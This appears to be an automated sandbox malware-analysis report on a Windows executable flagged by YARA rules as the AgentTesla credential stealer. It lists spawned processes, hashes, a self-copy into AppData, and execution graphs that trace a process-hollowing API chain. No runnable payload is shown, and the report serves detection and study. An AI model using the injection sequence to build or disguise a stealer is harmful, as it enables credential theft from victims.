                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:22:21:00
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:22:21:00
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\iNFGd6bDZX.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\iNFGd6bDZX.exe"
                                                                                                              Imagebase:0xf20000
                                                                                                              File size:927'232 bytes
                                                                                                              MD5 hash:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Target ID:6
                                                                                                              Start time:22:21:01
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              Imagebase:0x7ff693ab0000
                                                                                                              File size:496'640 bytes
                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:22:21:10
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                              Imagebase:0xdd0000
                                                                                                              File size:927'232 bytes
                                                                                                              MD5 hash:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:22:21:11
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                              Imagebase:0x380000
                                                                                                              File size:927'232 bytes
                                                                                                              MD5 hash:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:9
                                                                                                              Start time:22:21:11
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                              Imagebase:0x220000
                                                                                                              File size:927'232 bytes
                                                                                                              MD5 hash:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:22:21:11
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                              Imagebase:0x6e0000
                                                                                                              File size:927'232 bytes
                                                                                                              MD5 hash:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Target ID:12
                                                                                                              Start time:22:21:19
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                              Imagebase:0x200000
                                                                                                              File size:927'232 bytes
                                                                                                              MD5 hash:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:13
                                                                                                              Start time:22:21:20
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                              Imagebase:0x360000
                                                                                                              File size:927'232 bytes
                                                                                                              MD5 hash:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:14
                                                                                                              Start time:22:21:20
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                                                                              Imagebase:0x720000
                                                                                                              File size:927'232 bytes
                                                                                                              MD5 hash:8FBFFB8434E574EA1BB6865DA7AF4C8D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:13.3%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:2.3%
                                                                                                                Total number of Nodes:132
                                                                                                                Total number of Limit Nodes:7
                                                                                                                execution_graph 20370 c778f0 20371 c778fb 20370->20371 20373 c77e38 20370->20373 20374 c77e5d 20373->20374 20378 c77f39 20374->20378 20382 c77f48 20374->20382 20380 c77f48 20378->20380 20379 c7804c 20379->20379 20380->20379 20386 c77b5c 20380->20386 20384 c77f6f 20382->20384 20383 c7804c 20383->20383 20384->20383 20385 c77b5c CreateActCtxA 20384->20385 20385->20383 20387 c78fd8 CreateActCtxA 20386->20387 20389 c7909b 20387->20389 20216 8eebc03 20217 8eebb86 20216->20217 20218 8eebc41 20216->20218 20217->20218 20221 8eed050 20217->20221 20236 8eed041 20217->20236 20222 8eed06a 20221->20222 20230 8eed08e 20222->20230 20251 8eed8a8 20222->20251 20255 8eed928 20222->20255 20259 8eed791 20222->20259 20264 8eed830 20222->20264 20268 8eed715 20222->20268 20273 8eedb54 20222->20273 20277 8eed696 20222->20277 20282 8eed979 20222->20282 20291 8eed7bd 20222->20291 20299 8eed63e 20222->20299 20304 8eed3e0 20222->20304 20310 8eed6a9 20222->20310 20230->20218 20237 8eed06a 20236->20237 20238 8eed928 2 API calls 20237->20238 20239 8eed8a8 2 API calls 20237->20239 20240 8eed6a9 2 API calls 20237->20240 20241 8eed3e0 2 API calls 20237->20241 20242 8eed63e 2 API calls 20237->20242 20243 8eed7bd 4 API calls 20237->20243 20244 8eed08e 20237->20244 20245 8eed979 4 API calls 20237->20245 20246 8eed696 2 API calls 20237->20246 20247 8eedb54 2 API calls 20237->20247 20248 8eed715 2 API calls 20237->20248 20249 8eed830 2 API calls 20237->20249 20250 8eed791 2 API calls 20237->20250 20238->20244 20239->20244 20240->20244 20241->20244 20242->20244 20243->20244 20244->20218 20245->20244 20246->20244 20247->20244 20248->20244 20249->20244 20250->20244 20315 8eeb348 20251->20315 20319 8eeb350 20251->20319 20252 8eed613 20323 8eeb5d8 20255->20323 20327 8eeb5d0 20255->20327 20256 8eed94a 20260 8eed6a9 20259->20260 20261 8eed6e1 20260->20261 20331 8eeb4e8 20260->20331 20335 8eeb4e0 20260->20335 20261->20230 20261->20261 20266 8eeb4e8 WriteProcessMemory 20264->20266 20267 8eeb4e0 WriteProcessMemory 20264->20267 20265 8eed858 20266->20265 20267->20265 20269 8eed735 20268->20269 20339 8eeb2a0 20269->20339 20343 8eeb299 20269->20343 20270 8eed74a 20270->20230 20275 8eeb4e8 WriteProcessMemory 20273->20275 20276 8eeb4e0 WriteProcessMemory 20273->20276 20274 8eedb82 20275->20274 20276->20274 20278 8eed6a3 20277->20278 20280 8eeb299 ResumeThread 20278->20280 20281 8eeb2a0 ResumeThread 20278->20281 20279 8eed74a 20279->20230 20280->20279 20281->20279 20283 8eedcfd 20282->20283 20284 8eed735 20283->20284 20289 8eeb348 Wow64SetThreadContext 20283->20289 20290 8eeb350 Wow64SetThreadContext 20283->20290 20286 8eed613 20284->20286 20287 8eeb299 ResumeThread 20284->20287 20288 8eeb2a0 ResumeThread 20284->20288 20285 8eed74a 20285->20230 20287->20285 20288->20285 20289->20284 20290->20284 20347 8eeb428 20291->20347 20351 8eeb420 20291->20351 20292 8eede9e 20293 8eed6a9 20293->20292 20295 8eeb4e8 WriteProcessMemory 20293->20295 20296 8eeb4e0 WriteProcessMemory 20293->20296 20294 8eed6e1 20294->20230 20295->20294 20296->20294 20300 8eed647 20299->20300 20301 8eed858 20300->20301 20302 8eeb4e8 WriteProcessMemory 20300->20302 20303 8eeb4e0 WriteProcessMemory 20300->20303 20302->20301 20303->20301 20305 8eed413 20304->20305 20306 8eee04d 20305->20306 20355 8eeb764 20305->20355 20359 8eeb770 20305->20359 20306->20230 20311 8eed6af 20310->20311 20313 8eeb4e8 WriteProcessMemory 20311->20313 20314 8eeb4e0 WriteProcessMemory 20311->20314 20312 8eed6e1 20312->20230 20313->20312 20314->20312 20316 8eeb395 Wow64SetThreadContext 20315->20316 20318 8eeb3dd 20316->20318 20318->20252 20320 8eeb395 Wow64SetThreadContext 20319->20320 20322 8eeb3dd 20320->20322 20322->20252 20324 8eeb623 ReadProcessMemory 20323->20324 20326 8eeb667 20324->20326 20326->20256 20328 8eeb5d5 ReadProcessMemory 20327->20328 20330 8eeb667 20328->20330 20330->20256 20332 8eeb530 WriteProcessMemory 20331->20332 20334 8eeb587 20332->20334 20334->20261 20336 8eeb530 WriteProcessMemory 20335->20336 20338 8eeb587 20336->20338 20338->20261 20340 8eeb2e0 ResumeThread 20339->20340 20342 8eeb311 20340->20342 20342->20270 20344 8eeb2e0 ResumeThread 20343->20344 20346 8eeb311 20344->20346 20346->20270 20348 8eeb468 VirtualAllocEx 20347->20348 20350 8eeb4a5 20348->20350 20350->20293 20352 8eeb468 VirtualAllocEx 20351->20352 20354 8eeb4a5 20352->20354 20354->20293 20356 8eeb7f9 CreateProcessA 20355->20356 20358 8eeb9bb 20356->20358 20358->20358 20360 8eeb7f9 CreateProcessA 20359->20360 20362 8eeb9bb 20360->20362 20362->20362 20363 8eee380 20364 8eee50b 20363->20364 20366 8eee3a6 20363->20366 20366->20364 20367 8ee9d58 20366->20367 20368 8eee600 PostMessageW 20367->20368 20369 8eee66c 20368->20369 20369->20366 20390 c7e778 20391 c7e7c0 GetModuleHandleW 20390->20391 20392 c7e7ba 20390->20392 20393 c7e7ed 20391->20393 20392->20391

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 664 c70e85-c70f45 call c700e4 667 c70f4a 664->667 668 c70f4f-c70f64 667->668 669 c71070-c710b9 call c700f4 668->669 670 c70f6a 668->670 695 c710bb call c71f77 669->695 696 c710bb call c71aa2 669->696 697 c710bb call c719f1 669->697 698 c710bb call c7204f 669->698 699 c710bb call c71a8e 669->699 700 c710bb call c71b1d 669->700 701 c710bb call c71a5c 669->701 702 c710bb call c71a79 669->702 670->667 670->669 671 c71023-c71027 670->671 672 c70f71-c70f89 670->672 673 c70ff0-c7101e 670->673 674 c70fc0-c70feb 670->674 675 c70f9f-c70fab 670->675 676 c7104d-c7106b 670->676 677 c70f8b-c70f9d 670->677 678 c7103a-c71048 670->678 679 c71030 671->679 680 c71029-c7102e 671->680 672->668 673->668 674->668 690 c70fb3-c70fbe 675->690 676->668 677->668 678->668 684 c71035 679->684 680->684 684->668 690->668 694 c710c1-c710ca 695->694 696->694 697->694 698->694 699->694 700->694 701->694 702->694
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q$Te^q
                                                                                                                • API String ID: 0-3743469327
                                                                                                                • Opcode ID: c8b3fa931a474005bc1be6ab21ff73a0ac2095b8979a26e4b5d70698a0f217a4
                                                                                                                • Instruction ID: 57f089751182e39db64d50c984a0835e6f01fcc683d5bba81e477e201b0c7a53
                                                                                                                • Opcode Fuzzy Hash: c8b3fa931a474005bc1be6ab21ff73a0ac2095b8979a26e4b5d70698a0f217a4
                                                                                                                • Instruction Fuzzy Hash: 7251E371B14285CFCB059FB9899466EBBF2FF85300F2584AAE519EF2A1CB708D05CB51

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 703 c70f18-c70f45 call c700e4 706 c70f4a 703->706 707 c70f4f-c70f64 706->707 708 c71070-c710b9 call c700f4 707->708 709 c70f6a 707->709 734 c710bb call c71f77 708->734 735 c710bb call c71aa2 708->735 736 c710bb call c719f1 708->736 737 c710bb call c7204f 708->737 738 c710bb call c71a8e 708->738 739 c710bb call c71b1d 708->739 740 c710bb call c71a5c 708->740 741 c710bb call c71a79 708->741 709->706 709->708 710 c71023-c71027 709->710 711 c70f71-c70f89 709->711 712 c70ff0-c7101e 709->712 713 c70fc0-c70feb 709->713 714 c70f9f-c70fab 709->714 715 c7104d-c7106b 709->715 716 c70f8b-c70f9d 709->716 717 c7103a-c71048 709->717 718 c71030 710->718 719 c71029-c7102e 710->719 711->707 712->707 713->707 729 c70fb3-c70fbe 714->729 715->707 716->707 717->707 723 c71035 718->723 719->723 723->707 729->707 733 c710c1-c710ca 734->733 735->733 736->733 737->733 738->733 739->733 740->733 741->733
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q$Te^q
                                                                                                                • API String ID: 0-3743469327
                                                                                                                • Opcode ID: e70d957443b50690a824e2eb7fb0caa3573d40ee52dcbf7aa2858dd528ef45f8
                                                                                                                • Instruction ID: 3e1242d8ddc63ae93c6de53cf19aa8f261f1415c3bb093f5975e21d329a78c90
                                                                                                                • Opcode Fuzzy Hash: e70d957443b50690a824e2eb7fb0caa3573d40ee52dcbf7aa2858dd528ef45f8
                                                                                                                • Instruction Fuzzy Hash: 6441C431B00155CFCB08DFAAC94466EB7F6FB88700F21846AE51AEB3A0DB319D058B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 21d87069f9551d8a8df98f9a485a8e8436393bada4c6de748965df2e2662361f
                                                                                                                • Instruction ID: 61b7943fefd1e8688a1803e9742bf9b8b87df38594f20339c40b2ab6b635340b
                                                                                                                • Opcode Fuzzy Hash: 21d87069f9551d8a8df98f9a485a8e8436393bada4c6de748965df2e2662361f
                                                                                                                • Instruction Fuzzy Hash: 2E3298727016048FDB19DBA9C450BAEB7F6AF89305F2484ADE10A9B3A1CF35ED41CB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 803f04da48f1c0e5385b412cf7e045dde788db8fcc564f1c07183806faaa7e57
                                                                                                                • Instruction ID: c48c804701016b3561be7867882fbc9f572c5affef604bce987ddd949d498a4e
                                                                                                                • Opcode Fuzzy Hash: 803f04da48f1c0e5385b412cf7e045dde788db8fcc564f1c07183806faaa7e57
                                                                                                                • Instruction Fuzzy Hash: 1CB15832A082458FD705DF69C8406FABB76AF43312F4891ABF655DF192C7358889C7A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c5176c90536e90a6445aa687b729f3a6ffe21b623645e364e1bef11f549d2849
                                                                                                                • Instruction ID: 4b51e7507be063d9aeedde2eba0ec82c3180ecf050477897cef0b4daa909569e
                                                                                                                • Opcode Fuzzy Hash: c5176c90536e90a6445aa687b729f3a6ffe21b623645e364e1bef11f549d2849
                                                                                                                • Instruction Fuzzy Hash: EE712871E45229CBDB64CF6ACC407E9B7B6BF99301F10D1EAE40DA6244EB745A85CF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e64de232f694be3a4b8ab421e64bece87e2aa0a47573c362bf186da84577794a
                                                                                                                • Instruction ID: ad279afc356fc1bfa4da4bf400a6acdfb3cfdcf07946723a696943b58bd47710
                                                                                                                • Opcode Fuzzy Hash: e64de232f694be3a4b8ab421e64bece87e2aa0a47573c362bf186da84577794a
                                                                                                                • Instruction Fuzzy Hash: EEA00207EEF804C480009C9859405F4E03C470F167F107C00B81F372060400C004400C

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 742 8eeb764-8eeb805 744 8eeb83e-8eeb85e 742->744 745 8eeb807-8eeb811 742->745 752 8eeb897-8eeb8c6 744->752 753 8eeb860-8eeb86a 744->753 745->744 746 8eeb813-8eeb815 745->746 747 8eeb838-8eeb83b 746->747 748 8eeb817-8eeb821 746->748 747->744 750 8eeb825-8eeb834 748->750 751 8eeb823 748->751 750->750 754 8eeb836 750->754 751->750 759 8eeb8ff-8eeb9b9 CreateProcessA 752->759 760 8eeb8c8-8eeb8d2 752->760 753->752 755 8eeb86c-8eeb86e 753->755 754->747 757 8eeb870-8eeb87a 755->757 758 8eeb891-8eeb894 755->758 761 8eeb87e-8eeb88d 757->761 762 8eeb87c 757->762 758->752 773 8eeb9bb-8eeb9c1 759->773 774 8eeb9c2-8eeba48 759->774 760->759 764 8eeb8d4-8eeb8d6 760->764 761->761 763 8eeb88f 761->763 762->761 763->758 765 8eeb8d8-8eeb8e2 764->765 766 8eeb8f9-8eeb8fc 764->766 768 8eeb8e6-8eeb8f5 765->768 769 8eeb8e4 765->769 766->759 768->768 771 8eeb8f7 768->771 769->768 771->766 773->774 784 8eeba4a-8eeba4e 774->784 785 8eeba58-8eeba5c 774->785 784->785 786 8eeba50 784->786 787 8eeba5e-8eeba62 785->787 788 8eeba6c-8eeba70 785->788 786->785 787->788 791 8eeba64 787->791 789 8eeba72-8eeba76 788->789 790 8eeba80-8eeba84 788->790 789->790 792 8eeba78 789->792 793 8eeba96-8eeba9d 790->793 794 8eeba86-8eeba8c 790->794 791->788 792->790 795 8eeba9f-8eebaae 793->795 796 8eebab4 793->796 794->793 795->796 798 8eebab5 796->798 798->798
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08EEB9A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: d78feba67bf20bcab41f50d59763aa08e8f85fce2e34e4742d7d21b9a60b2974
                                                                                                                • Instruction ID: 56b635de0269c95eb017fa925e32322b984e77547846bd5c4c2d1e31d21391de
                                                                                                                • Opcode Fuzzy Hash: d78feba67bf20bcab41f50d59763aa08e8f85fce2e34e4742d7d21b9a60b2974
                                                                                                                • Instruction Fuzzy Hash: C9A15B72D00219DFDF20CFA8C8417EDBBB2AF88315F1481A9E859B7250DB749985CF92

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 799 8eeb770-8eeb805 801 8eeb83e-8eeb85e 799->801 802 8eeb807-8eeb811 799->802 809 8eeb897-8eeb8c6 801->809 810 8eeb860-8eeb86a 801->810 802->801 803 8eeb813-8eeb815 802->803 804 8eeb838-8eeb83b 803->804 805 8eeb817-8eeb821 803->805 804->801 807 8eeb825-8eeb834 805->807 808 8eeb823 805->808 807->807 811 8eeb836 807->811 808->807 816 8eeb8ff-8eeb9b9 CreateProcessA 809->816 817 8eeb8c8-8eeb8d2 809->817 810->809 812 8eeb86c-8eeb86e 810->812 811->804 814 8eeb870-8eeb87a 812->814 815 8eeb891-8eeb894 812->815 818 8eeb87e-8eeb88d 814->818 819 8eeb87c 814->819 815->809 830 8eeb9bb-8eeb9c1 816->830 831 8eeb9c2-8eeba48 816->831 817->816 821 8eeb8d4-8eeb8d6 817->821 818->818 820 8eeb88f 818->820 819->818 820->815 822 8eeb8d8-8eeb8e2 821->822 823 8eeb8f9-8eeb8fc 821->823 825 8eeb8e6-8eeb8f5 822->825 826 8eeb8e4 822->826 823->816 825->825 828 8eeb8f7 825->828 826->825 828->823 830->831 841 8eeba4a-8eeba4e 831->841 842 8eeba58-8eeba5c 831->842 841->842 843 8eeba50 841->843 844 8eeba5e-8eeba62 842->844 845 8eeba6c-8eeba70 842->845 843->842 844->845 848 8eeba64 844->848 846 8eeba72-8eeba76 845->846 847 8eeba80-8eeba84 845->847 846->847 849 8eeba78 846->849 850 8eeba96-8eeba9d 847->850 851 8eeba86-8eeba8c 847->851 848->845 849->847 852 8eeba9f-8eebaae 850->852 853 8eebab4 850->853 851->850 852->853 855 8eebab5 853->855 855->855
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08EEB9A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e05bab92b8d255c37653f7cba052a9acc351236df869ba279e2d810d18186c5b
                                                                                                                • Instruction ID: d3ace68221e886630a479a2e97c660c7b7789cd817f861e5c105d7e847b082e7
                                                                                                                • Opcode Fuzzy Hash: e05bab92b8d255c37653f7cba052a9acc351236df869ba279e2d810d18186c5b
                                                                                                                • Instruction Fuzzy Hash: 8B913A72D00619DFDF24CFA8C8417EDBBB2AF88315F1481A9E858B7250DB749985CF92

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 964 c78fcc-c78fd7 965 c78fd8-c79099 CreateActCtxA 964->965 967 c790a2-c790fc 965->967 968 c7909b-c790a1 965->968 975 c790fe-c79101 967->975 976 c7910b-c7910f 967->976 968->967 975->976 977 c79111-c7911d 976->977 978 c79120 976->978 977->978 980 c79121 978->980 980->980
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00C79089
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
